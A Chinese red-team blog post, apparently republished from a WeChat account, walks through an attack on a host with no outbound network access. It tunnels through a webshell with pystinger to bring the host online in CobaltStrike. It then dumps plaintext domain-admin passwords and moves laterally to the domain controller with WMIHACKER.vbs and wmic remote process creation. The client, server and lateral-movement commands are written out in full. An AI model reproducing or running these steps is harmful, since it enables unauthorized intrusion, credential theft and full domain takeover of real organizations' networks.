[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

  • A+
所属分类:安全文章

渗透攻击红队

一个专注于红队攻击的公众号

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?


大家好,这里是 渗透攻击红队 的第 68 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!


当跳板机器出网的情况下,我们可以随意内网渗透,只需注意免杀问题,那如何拿到一个 Webshell 不出网的情况下,如何进目标内网?如何上线到 C2?


不出网的内网域渗透

前言


首先是拿到了一个 Webshell:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

通过初步判断当前机器 icmp 不出网:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

那怎么办呢?我们可以基于 HTTP 隧道打!


基于 HTTP 隧道上线到 CobaltStrike


项目地址:https://github.com/FunnyWolf/pystinger

这个东东可以让 Webshell 实现内网 Socks4 代理,让不出网机器上线到 MSF/CS,使用 python 写的一款工具,支持目标站点 php、jsp(x)、aspx 三种脚本语言!

先上传对应的 Pystinger webshell 文件并成功访问:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

然后我们还需要将 stinger_server.exe 上传到目标服务器 ,执行如下命令:

start c:Windowstempcookiestinger_server.exe 0.0.0.0

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

然后将 stinger_client 上传到 vps ,执行如下命令

./stinger_client -w http://saulgoodman.cn:9009//wls-wsat/proxy.jsp -l 0.0.0.0 -p 60000

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

此时已将目标服务器的 60020 端口映射到 VPS 的 60020 端口了!

这个时候我们 CobaltStrike 设置监听,http host 填写目标内网的  IP 地址:192.168.0.9,端口填写 60020:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

然后我们生成一个 exe,监听器就是刚刚设置的那个:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

然后目标运行 exe 马,直接上线到 CobaltStrike:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?


内网信息搜集


通过 nbtscan 对当前内网进行信息搜集发现当前内网是存在域环境的:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

由于当前已经是 administrator 了,且是 Windows 2008 的机器,可以直接抓明文:

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

抓到了本地管理员和域管明文还有一些域用户的明文!既然域控是 192.168.0.2 这台,那么直接 WMI 横向把:

shell cscript  c:windowstempWMIHACKER.vbs /cmd 192.168.0.2 BExxxxadministrator vmxxxxx whoami 1

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

直接拿到域控 system 权限!我们还可以用系统自带的 WMI 来执行命令,只不过命令不回显:

wmic /node:192.168.0.2 /user:BEHxxxxadministrator /password:vm$xxxx process call create "cmd.exe /c ipconfig > c:result.txt"            type \192.168.0.2c$result.txt

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

这篇文章主要就是想表达不出网也是可以对它进行内网渗透的,并不是遇到不出网环境就不能打内网,方法很多,知识面还是会决定你的杀伤链!


[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

渗透攻击红队

一个专注于渗透红队攻击的公众号

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?



[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?
点分享
[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?
点点赞
[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?
点在看

本文始发于微信公众号(渗透攻击红队):[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: